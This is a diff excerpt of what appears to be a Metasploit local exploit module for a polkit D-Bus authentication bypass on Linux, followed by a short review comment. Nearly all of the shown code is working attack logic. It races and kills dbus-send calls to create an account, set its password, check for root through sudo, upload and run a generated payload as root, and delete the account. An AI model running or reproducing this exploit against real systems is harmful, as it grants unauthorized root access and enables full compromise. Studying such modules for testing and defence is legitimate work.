modules/exploits/linux/local/polkit_dbus_auth_bypass.rb

```diff
@@ -0,0 +1,373 @@
+    UnixCrypt::SHA256.build(datastore['PASSWORD'].to_s)
+  end
+
+  def exploit_set_username(loop_sequence)
+    cmd_exec(<<~SCRIPT
+      for i in #{loop_sequence}; do
+        dbus-send
+          --system
+          --dest=org.freedesktop.Accounts
+          --type=method_call
+          --print-reply
+          /org/freedesktop/Accounts
+          org.freedesktop.Accounts.CreateUser
+          string:#{datastore['USERNAME']}
+          string:\"#{datastore['USERNAME']}\"
+          int32:1 &
+        sleep #{@cmd_delay}s;
+        kill $!;
+        if id #{datastore['USERNAME']}; then
+          echo \"success\";
+          break;
+        fi;
+      done
+    SCRIPT
+               .gsub(/\s+/, ' ')) =~ /success/
+  end
+
+  def exploit_set_password(uid, hashed_password, loop_sequence)
+    cmd_exec(<<~SCRIPT
+      for i in #{loop_sequence}; do
+        dbus-send
+          --system
+          --dest=org.freedesktop.Accounts
+          --type=method_call
+          --print-reply
+          /org/freedesktop/Accounts/User#{uid}
+          org.freedesktop.Accounts.User.SetPassword
+          string:'#{hashed_password}'
+          string: &
+        sleep #{@cmd_delay}s;
+        kill $!;
+        echo #{datastore['PASSWORD']}
+        | su - #{datastore['USERNAME']}
+        -c \"echo #{datastore['PASSWORD']} | sudo -S id\"
+        | grep \"uid=0(root)\";
+        if [ $? -eq 0 ]; then
+          echo \"success\";
+          break;
+        fi;
+      done;
+    SCRIPT
+               .gsub(/\s+/, ' ')) =~ /success/
+  end
+
+  def exploit_delete_user(uid, loop_sequence)
+    cmd_exec(<<~SCRIPT
+      for i in #{loop_sequence}; do
+        dbus-send
+          --system
+          --dest=org.freedesktop.Accounts
+          --type=method_call
+          --print-reply
+          /org/freedesktop/Accounts
+          org.freedesktop.Accounts.DeleteUser
+          int64:#{uid}
+          boolean:true &
+        sleep #{@cmd_delay}s;
+        kill $!;
+        if id #{datastore['USERNAME']}; then
+          echo \"failed\";
+        else
+          echo \"success\";
+          break;
+        fi;
+      done
+    SCRIPT
+               .gsub(/\s+/, ' ')) =~ /success/
+  end
+
+  def upload(path, data)
+    print_status "Writing '#{path}' (#{data.size} bytes) ..."
+    rm_f path
+    write_file path, data
+    register_file_for_cleanup path
+  end
+
+  def upload_and_chmodx(path, data)
+    upload path, data
+    chmod path
+  end
+
+  def upload_payload
+    fname = "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha(5)}"
+    upload_and_chmodx(fname, generate_payload_exe)
+    return nil unless file_exist?(fname)
+
+    fname
+  end
+
+  def execute_payload(fname)
+    cmd_exec("echo #{datastore['PASSWORD']} | su - #{datastore['USERNAME']} -c \"echo #{datastore['PASSWORD']} | sudo -S #{fname}\"")
+  end
+
+  def exploit
+    fail_with(Failure::NotFound, 'Failed to access /bin/su which this exploit depends on.') unless executable?('/bin/su')
```

Comment:
Also might want to check if the `dbus-send` command exists before proceeding with the exploit.